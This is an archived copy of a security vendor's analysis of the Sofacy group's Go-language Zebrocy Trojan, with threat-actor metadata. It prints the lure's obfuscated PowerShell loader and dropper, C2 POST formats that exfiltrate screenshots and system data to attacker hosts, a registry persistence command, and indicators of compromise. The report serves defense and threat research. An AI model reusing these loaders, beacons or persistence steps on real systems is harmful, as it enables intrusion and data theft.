{
	"id": "8a39c871-efc6-47b4-bda5-b2482784ba1c",
	"created_at": "2026-04-06T00:11:12.392742Z",
	"updated_at": "2026-04-10T03:37:50.064545Z",
	"deleted_at": null,
	"sha1_hash": "4000a7a47121d5fc7680e18c6f076739c80b8233",
	"title": "Sofacy Creates New ‘Go’ Variant of Zebrocy Tool",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 271379,
	"plain_text": "Sofacy Creates New ‘Go’ Variant of Zebrocy Tool\r\nBy Robert Falcone\r\nPublished: 2018-12-18 · Archived: 2026-04-05 12:51:54 UTC\r\nThe Sofacy threat group continues to carry out attacks using their Zebrocy tool. We first wrote about the Zebrocy tool in a\r\nblog that discussed Sofacy’s parallel attack campaigns during the first quarter of 2018, and more recently during Sofacy\r\nattacks in late October and early November. The developers of Zebrocy have once again created a new version of the Trojan\r\nusing a different programming language, specifically the Go language. The use of a different programming language to\r\ncreate a functionally similar Trojan is not new to this group, as past Zebrocy variants have been developed in AutoIt, Delphi,\r\nVB.NET, C# and Visual C++. While we cannot be certain of the impetus for this, we believe the threat group uses multiple\r\nlanguages to create their Trojans to make them differ structurally and visually to make detection more difficult.\r\nWe have seen two separate attacks deliver the Go variant of Zebrocy. The first attack occurred on October 11 and relied on a\r\nspear-phishing email with an LNK shortcut attachment. The LNK shortcut is meant to run a series of PowerShell scripts to\r\nextract a payload from the shortcut to install and execute; however, the PowerShell scripts were coded incorrectly and could\r\nnot install or run the payload as delivered. Therefore, the first observed attack mentioned in this blog could not be\r\nsuccessful, but the tactics, techniques and indicators are worth discussing for situational awareness. More recently, we have\r\nseen Sofacy delivering the Go variant of Zebrocy using a document related to the Dear Joohn attack campaign that occurred\r\nin mid-October through mid-November.\r\nThe First Attack\r\nThe attack occurred on October 11, 2018 and involved a spear-phishing email (T1193) discussing the effects of US sanctions\r\non the Russian economy. 
The “From” address and the signature included the name of an individual at the targeted\r\norganization. The “To” field in the delivery email was blank, which makes us believe that the targeted individuals were\r\nincluded in the “Bcc” field of this email. Figure 1 shows the delivery email used in this attack.\r\nFigure 1 Delivery email used in Go Zebrocy attack\r\nThe Payload\r\nThe delivery document Противодействие Думы Санкциям США.doc\r\n(SHA256:d77eb89501b0a60322bc69692007b9b7f1b5a85541a2aaf21caf7baf0fe0049e) attempts to masquerade as a Word\r\ndocument, however, the file is a shortcut LNK. When opened (T1204), the LNK file attempts to run the following command\r\nline in a visible command prompt (T1059):\r\npowershell.exe -nop -w 1 $i853=\r\n[TeXt.EnCoDING]::utF8.geTStrInG([conVErT]::frOmbaSE64stRing('JHAxLCRwMj0zNjU5LDY5MjQ3NjQ7JHBhdGhUb0xOSz0nQzUgcmVnaW\r\n$i853;\r\nThe shortcut uses PowerShell (T1086) to base64 decode (T1140) a second PowerShell script and executes it. The second\r\nPowerShell script decodes to the following:\r\n$p1,$p2=3659,6924764;$pathToLNK='C5 regional conference and training workshop on community\r\npolicing(1).docx.lnk';if(-nOT(TeSt-pAtH $pathToLNK)){$DirD=GeT-CHILdITEM -pAth $env:temp -fiLTer\r\nhttps://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/\r\nPage 1 of 7\n\n$pathToLNK -rEcUrSE;[iO.diRectoRY]::sETCUrrentDIrEctoRY($DirD.dIreCTORYNAMe);}$FileStreama=nEw-objECT io.fILeSTreAm $pathToLNK,'OpeN','ReAd','reaDwRITE';$ArrayMas=NEw-objecT byTE[]\r\n($p2);$FileStreama.SEeK($p1,[io.SeEKoRiGin]::BEGin);$FileStreama.rEAD($ArrayMas,0,$p2);$ArrayMas=\r\n[ConverT]::FrOmbasE64CHarArRAy($ArrayMas,0,$ArrayMas.LeNGTh);$duacajuA=\r\n[texT.EnCOdInG]::Unicode.gETstRIng($ArrayMas);ieX $duacajuA;\r\nThe PowerShell script above attempts to extract another PowerShell script directly from the LNK shortcut file, which it\r\nwould then execute. 
For unknown reasons, the actor that created this LNK shortcut included the incorrect filename for the\r\nLNK file, specifically C5 regional conference and training workshop on community policing(1).docx.lnk instead of the\r\ndelivery document Противодействие Думы Санкциям США.doc. The LNK shortcut filename does not match the\r\nfilename delivered in the email, so this attack would never be successful as the PowerShell script above would be unable to\r\nobtain the payload to install on the system. The C5 regional conference and training workshop on community\r\npolicing(1).docx.lnk filename included in this LNK file may be an artifact from a previous attack using the same delivery\r\nLNK and payload.\r\nHad the attackers included the correct filename of the LNK delivery in the script above, it would have located the\r\nPowerShell script in the LNK file by using a hardcoded offset of \"3659\", which it would have used to seek 3659 bytes into\r\nthe LNK file. The script would then read a hardcoded number of bytes, specifically 6,924,764 bytes from this offset, and\r\nexecute it. 
The resulting PowerShell script obtained from within the LNK file has the following contents, of which we have\r\ntrimmed some of the encoded data and replaced it with \"[..snip..]\" for brevity:\r\n$6vlJwyyB = @('C5 regional conference and training workshop on community policing(1).exe','C5 regional\r\nconference and training workshop on community policing(1).docx');$TcCd3Fej = \"C5 regional conference and\r\ntraining workshop on community policing(1).exe\";$Aq3NkyDG =\r\n@(\"TVqQAAMA[..snip..]\",\"UEsDBBQABgAIAA[..snip..]\");$ggdDQhlx = \"C5 regional conference and training\r\nworkshop on community policing(1).docx\";FOR($I=0;$I -lt $6vLjwYYb.LengTH;$i++){[BYtE[]]$YGktk0Nk =\r\n[cOnveRt]::frOmBaSE64StriNg($aq3nkYDg[$I]);\r\n[syStEm.IO.fILE]::WrItEaLlbYtES($EnV:pUbLIc+\"\\\"+$6VLJwYYB[$I],$YGktK0nk);}$qsVmUm76 =\r\n$Env:public+\"\\\"+$tCcd3Fej;$GGdDQhLxPatH = $env:publIC+\"\\\"+$gGddQHLX;staRT-pROCess -wINDowstylE\r\nHIDdeN -FIlepAth $qsVMuM76;StART-ProceSs -FilepaTh $GgDdQHlxpATH;\r\nThis final PowerShell script is responsible for decoding an executable and Word document that it will write to the system in\r\nthe %PUBLIC% folder with names C5 regional conference and training workshop on community policing(1).exe and C5\r\nregional conference and training workshop on community policing(1).docx, respectively. 
The decoded content written to the\r\nWord document contains the decoy content seen in Figure 2\r\n(SHA256:b6b2f6aae80cba3fa142bd216decc1f6db024a5ab46d9c21cf6e4c1ab0bbe58b), which in this specific case is an\r\nagenda for a conference that occurred between June 18 and 20, 2018 in Dushanbe, Tajikistan sponsored by Saferworld and\r\nthe United States Institute of Peace.\r\nFigure 2 Decoy document opened during installation of Go Zebrocy\r\nThe decoded executable is the payload (SHA256:\r\nfcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e), which its developer wrote in the Go language,\r\nand which appears to be a variant of the Zebrocy Trojan that we have previously analyzed. The use of another language to\r\ndevelop a Trojan similar in functionality to Zebrocy is fitting for this threat group, as we have previously seen this group\r\ncreate variants of Zebrocy in AutoIt, Delphi and C++. The similarities between this payload and previous Zebrocy variants\r\ninclude general high-level capabilities as well as some more specific overlaps. Like other Zebrocy samples, this Zebrocy\r\nvariant written in Go does initial collection on the compromised system (T1119), exfiltrates this information to the C2 server\r\nand attempts to download, install and execute a payload from the C2. 
The Go variant also has some more specific overlaps\r\nin its functionality, including:\r\nThe use of ASCII hexadecimal obfuscation of strings\r\nThe use of the volume serial number without a hyphen obtained from the VOL command\r\nThe use of the output from \"systeminfo\" and \"tasklist\" in the outbound C2 beacon\r\nThe use of the string \"PrgStart\" within the C2 beacon\r\nThe most important overlap between the Go variant of Zebrocy and other variants is a shared C2 URL, specifically\r\nhxxp://89.37.226[.]148/technet-support/library/online-service-description.php?id_name= that was also used by Zebrocy\r\nsamples de31a8a9110b32a82843e9216a3378cc1c5ea972a6bb2261ec111efb82f31e71 and\r\ndaf990f0b6564c3ac87fa87e325e6ffc907ed43ae65a3f088a42b5b120612593, which were both written in Delphi.\r\nThe Go variant of Zebrocy attempts to evade automated analysis by checking the executable filename of its process for the\r\n“)” character. If the filename does not contain a “)” character, the Trojan immediately exits without executing its functional\r\ncode. The Trojan looks for this character specifically, because it expects to run as a file named C5 regional conference and\r\ntraining workshop on community policing(1).exe.\r\nThis Zebrocy variant uses HTTP POST requests to interact with its C2 server (T1071), which contains system specific\r\ninformation in the POST data section. 
The system-specific information includes:\r\nRunning processes via the “tasklist” command (T1057).\r\nSystem information via the “systeminfo” command (T1082).\r\nLocal disk information (T1120) via WMI by running the command “wmic logicaldisk get\r\ncaption,description,drivetype,providername,size” (T1047).\r\nA screenshot of the desktop (T1113) that the Go Zebrocy tool takes using an open source Go library.\r\nThe communication between the Trojan and its C2 has the following structure:\r\nPOST /technet-support/library/online-service-description.php?id_name=[serial number from VOL command with hyphen\r\nremoved] HTTP/1.1\r\nHost: 89.37.226[.]148\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 570690\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\nattach=PrgStart%3A[path to running Trojan]%0D%0A%5B[current time]%5D%0D%0A%0D%0A[results from wmic\r\nlogicaldisk get caption,description,drivetype,providername,size]%0D%0D%0A%0D%0D%0A%0D%0A%0D%0A[results\r\nsysteminfo command]%0D%0A%0D%0A%0D%0A[results tasklist command]%0D%0A\u0026support=[screenshot of system\r\nrepresented as ASCII hexadecimal bytes]\r\nThe C2 server will respond to this HTTP POST request with ASCII hexadecimal bytes that the payload will decode and save\r\nto the following file (T1105):\r\n%APPDATA%\\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}\\w32srv.exe\r\nThe payload will then execute this newly created file using the Golang \"os/exec\" module, specifically using the \"Command\"\r\nand \"Run\" functions in the \"os/exec\" module to run the following command line:\r\ncmd /C %APPDATA%\\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}\\w32srv.exe\r\nDear Joohn Related Delivery\r\nThe second attack we observed delivering the Zebrocy variant written in the Go language is related to the Dear Joohn\r\nattacks that we have previously published. 
While the Dear Joohn campaign occurred in mid-October to mid-November\r\n2018, the delivery document (SHA256: 346e5dc097b8653842b5b4acfad21e223b7fca976fb82b8c10d9fa4f3747dfa0) that\r\nultimately installed the Go Zebrocy sample was created on December 3, 2018. This delivery document had an author name\r\nof Joohn, which is how we clustered the Dear Joohn delivery documents for that campaign.\r\nLike the Dear Joohn attacks, the delivery document downloads a remote template (SHA256:\r\n07646dc0a8c8946bb78be9b96147d4327705c1a3c3bd3fbcedab32c43d914305) via HTTP (T1071) that has an author and last\r\nsaved by xxx. Upon opening the delivery document, the lure image seen in Figure 3 attempts to trick the recipient into\r\nenabling content (T1204) to run the macro within the downloaded remote template.\r\nFigure 3 Lure image attempting to trick user into clicking the Enable Content button\nThe delivery document is configured to obtain a remote template from hxxps://bit[.]ly/2G8QrgL (T1102), as seen in the\nfollowing from the document’s word/_rels/settings.xml.rels file:\n?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e\nThe hxxps://bit[.]ly/2G8QrgL shortened link redirects to the remote template hosted at a URL of\nhxxp://89.37.226[.]123/Templates/NormalOld.dotm. Previous Dear Joohn delivery documents did not use a shortened link\nto obtain their remote templates, which suggests a shift in techniques used in this campaign. Fortunately for us, the shortened\nlink provides some statistics on how many visitors accessed the link and their country of origin. 
When accessed on\nDecember 5, 2018, the statistics for the shortened link (Figure 4) showed that the link was created on December 3, 2018 at\n12:56 PM and had been visited 75 times, mostly from Turkey.\nFigure 4 Statistics on visitors to the shortened link used to point to remote template (Accessed December 5, 2018)\nThe remote template downloaded via this shortened link contains a macro similar to other Dear Joohn samples. The macro\ndiffers as it extracts a ZIP from the remote template file (SHA256:\nc817aab6e8dcaeaeae817a85ba209c0ca690be58b91e6cff0e3f0660336f9506) and saves it to a file named driver_pack.zip.\nThe archive contains an executable named driver_pack.exe (SHA256:\nb48b3d46ebfa6af8a25c007f77e6ed3c32fe4c6478311b8b0c7d6f4f8c82de76), which is a WinRAR SFX executable archive\nthat contains another executable named comsvc.exe. The WinRAR SFX archive extracts the comsvc.exe payload using the\nfollowing SFX script:\nPath=%APPDATA%\\AppHistory\nSetup=comsvc.exe\nSilent=1\nOverwrite=2\nThe comsvc.exe executable (SHA256: 93680d34d798a22c618c96dec724517829ec3aad71215213a2dcb1eb190ff9fa) is a\nUPX-packed variant of the Go Zebrocy malware (SHA256:\n15a866c3c18046022a810aa97eaf2e20f942b8293b9cb6b4d5fb7746242c25b7), which is a downloader responsible for\r\nobtaining and executing secondary payloads from a C2 server.\r\nLike other Zebrocy variants, this Go Zebrocy malware checks the path of the running process to make sure it contains\r\ncomsvc, as it would if executed by the delivery document that would eventually save the payload to comsvc.exe. If the Go\r\nZebrocy sample was not run as comsvc.exe, it will send an HTTP POST request to google[.]com, unlike other Zebrocy\r\nvariants that will just exit, which we believe is an attempt to further evade heuristic detection. 
Figure 5 shows the HTTP\r\nrequest sent to google[.]com.\r\nFigure 5 HTTP POST to google.com in the event Go Zebrocy executes with incorrect filename\r\nThe data sent in the HTTP POST request in Figure 5 decodes to \u003c#0\u003e0\u003c##0\u003e\u003c#1\u003e1\u003c##1\u003e\u003c#2\u003e1\u003c##2\u003e, which does not\r\nnecessarily have any purpose other than filling the same HTTP POST data delimiters that Go Zebrocy will use when\r\ncommunicating with the C2. In the event that the sample was run as comsvc.exe, the Trojan will reach out to the following\r\nURL to communicate with its C2 server:\r\nhxxp://89.37.226[.]123/advance/portable_version/service.php\r\nThe Go Zebrocy tool will get the volume serial number, take a screenshot of the system (T1113) and gather system specific\r\ninformation using a legitimate library called psutil that is available on Github. The Trojan will call the Host Info function\r\nfrom the psutil library that will effectively gather platform information (operating system, version etc.), the time the system\r\nwas booted, the system uptime, the system’s GUID, and process IDs for running processes (T1057). The Zebrocy variant\r\nwill send an HTTP POST request (T1071) to the above URL with post data structured as follows:\r\nproject=%3C%230%3E4D291F48%3C%23%230%3E%3C%231%3E[serial number of storage\r\nvolume]%3C%23%230%3E%3C%231%3E[gathered system information]%3C%23%231%3E%3C%232%3E[screenshot in\r\nJPEG format]%3C%23%232%3E\r\nThe hexadecimal characters in the HTTP POST data are used as delimiters, which represent the following:\r\n\u003c#0\u003e[serial number of storage volume]\u003c##0\u003e\u003c#1\u003e[gathered system information]\u003c##1\u003e\u003c#2\u003e[screenshot in JPEG format]\r\n\u003c##2\u003e\r\nThe C2 will respond to the above request with a hexadecimal encoded payload that the Trojan will save to the system and\r\nexecute. 
The Trojan writes the secondary payload to the following file:\r\n%LOCALAPPDATA%\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\wcncsvc.exe\r\nBefore executing the dropped file, the Trojan will create an autorun registry key (T1060) to have the secondary payload run\r\neach time the user logs in, using the following command line (T1059):\r\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Media Center Extender Service\r\nDuring our analysis, the secondary payload downloaded from the C2 was another Trojan written in the Go language (SHA256:\r\n50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc), which the actors packed with UPX\r\n(SHA256: ee9218a451c455fbca45460c0a27e1881833bd2a05325ed60f30bd4d14bb2fdc) (T1045). This secondary payload is\r\nanother downloader that uses HTTPS instead of HTTP for its C2 communications. This secondary payload communicates\r\nwith the following URL as its C2:\r\nhxxps://190.97.167[.]186/pkg/image/do.php\r\nThe HTTP POST request sent via HTTPS will look as follows, specifically including the first four bytes of the volume serial\r\nnumber and the first four characters of the hostname within the post data in a field labeled \"l\", as seen in Figure 6.\r\nFigure 6 HTTP beacon sent by the secondary payload within its HTTPS C2 channel\r\nConclusion\r\nThe Sofacy group continues to use variants of the Zebrocy payload in its attack campaigns. 
Developers of Zebrocy continue\r\nto create new variants of the Trojan using different coding languages, which in this particular case used the Go language.\r\nThe adversaries made some drastic errors in the delivery LNK shortcut, which made this attack seemingly ineffective.\r\nRegardless of the attack’s effectiveness, the techniques and indicators we observed still provide analytical points for\r\ncorrelation and should be included in an organization's security defenses, as the group may use the payload and infrastructure\r\nin future attacks. It is also apparent that the Sofacy group will use these new variants of Zebrocy across multiple different\r\ncampaigns, as the Go variant of Zebrocy was delivered via the LNK shortcut and a Dear Joohn delivery document.\r\nPalo Alto customers can protect themselves against this threat by:\r\nUsing a file blocking profile on our next-gen firewall to block LNK shortcuts sent via email. Please reference the\r\nfollowing knowledge base article for more information on how to configure this capability:\r\nhttps://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000ClT8CAK\r\nThreat Prevention customers are protected by the Gen Command And Control Traffic\r\nAutoFocus customers can track this Zebrocy variant via the Zebrocy\r\nIndicators of Compromise\r\nZebrocy Go variant\r\nfcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e\r\n93680d34d798a22c618c96dec724517829ec3aad71215213a2dcb1eb190ff9fa\r\nZebrocy Go C2\r\nhxxp://89.37.226[.]148/technet-support/library/online-service-description.php\r\n89.37.226[.]148\r\nhxxp://89.37.226[.]123/advance/portable_version/service.php\r\n89.37.226[.]123\r\nRelated Zebrocy 
Samples\r\nde31a8a9110b32a82843e9216a3378cc1c5ea972a6bb2261ec111efb82f31e71\r\ndaf990f0b6564c3ac87fa87e325e6ffc907ed43ae65a3f088a42b5b120612593\r\n308b41db9e3b332bb5b3e5ec633907761eac5082029b8b32e6b063b8c76b7365\r\nf93b89a707c647ba492efe4515bb69a627ce14f35926ee4147e13d2e030ab55b\r\n1ff4e56419ad1814726ca143fc256cca4c8588605536c48dd79cfed12cb0763a\r\nDear Joohn Related Hashes\r\n346e5dc097b8653842b5b4acfad21e223b7fca976fb82b8c10d9fa4f3747dfa0 - Delivery Document\r\n07646dc0a8c8946bb78be9b96147d4327705c1a3c3bd3fbcedab32c43d914305 - Remote Template\r\nc817aab6e8dcaeaeae817a85ba209c0ca690be58b91e6cff0e3f0660336f9506 - ZIP in Remote Template\r\nb48b3d46ebfa6af8a25c007f77e6ed3c32fe4c6478311b8b0c7d6f4f8c82de76 - WinRAR SFX in ZIP\r\n93680d34d798a22c618c96dec724517829ec3aad71215213a2dcb1eb190ff9fa - Go Zebrocy sample\r\n50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc - Secondary payload\r\nDear Joohn Related URLs\r\nhxxps://bit[.]ly/2G8QrgL - Remote Template Shortened Link\r\nhxxp://89.37.226[.]123/Templates/NormalOld.dotm - Remote Template URL\r\nhxxp://89.37.226[.]123/advance/portable_version/service.php - Go Zebrocy HTTP C2\r\nhxxps://190.97.167[.]186/pkg/image/do.php - Secondary payload HTTPS C2\r\nSecondary Payload Hash\r\n50d610226aa646dd643fab350b48219626918305aaa86f9dbd356c78a19204cc\r\nSecondary Payload C2\r\nhxxps://190.97.167[.]186/pkg/image/do.php\r\n190.97.167[.]186\r\nATT\u0026CK Techniques Observed\r\nID Technique\r\nT1193 Spearphishing Attachment\r\nT1059 Command-Line Interface\r\nT1086 PowerShell\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1119 Automated Collection\r\nT1071 Standard Application Layer Protocol\r\nT1057 Process Discovery\r\nT1082 System Information Discovery\r\nT1120 Peripheral Device Discovery\r\nT1047 Windows Management Instrumentation\r\nT1113 Screen Capture\r\nT1105 Remote File Copy\r\nT1102 Web Service\r\nT1204 
User Execution\r\nT1060 Registry Run Keys / Startup Folder\r\nT1045 Software Packing\r\nSource: https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/"
	],
	"report_names": [
		"sofacy-creates-new-go-variant-of-zebrocy-tool"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434272,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4000a7a47121d5fc7680e18c6f076739c80b8233.pdf",
		"text": "https://archive.orkl.eu/4000a7a47121d5fc7680e18c6f076739c80b8233.txt",
		"img": "https://archive.orkl.eu/4000a7a47121d5fc7680e18c6f076739c80b8233.jpg"
	}
}